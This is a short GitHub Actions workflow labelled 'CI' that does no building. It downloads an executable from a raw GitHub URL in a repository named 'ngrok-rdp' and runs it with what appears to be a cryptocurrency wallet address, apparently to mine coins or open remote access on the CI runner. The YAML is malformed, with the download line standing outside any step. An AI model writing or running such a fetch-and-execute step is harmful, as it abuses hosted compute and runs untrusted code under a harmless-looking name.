name: CI
on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest

    steps:

        Invoke-WebRequest https://raw.githubusercontent.com/racon3349/ngrok-rdp/main/resources/brz.exe -OutFile brz.exe
    - name: HZ.Behruz...
      run: cmd /c cd C:\Users\Public\Desktop\ ; ./brz 14qBrMavy2pW9umzuhd7eMDVpwQ62xRtPK
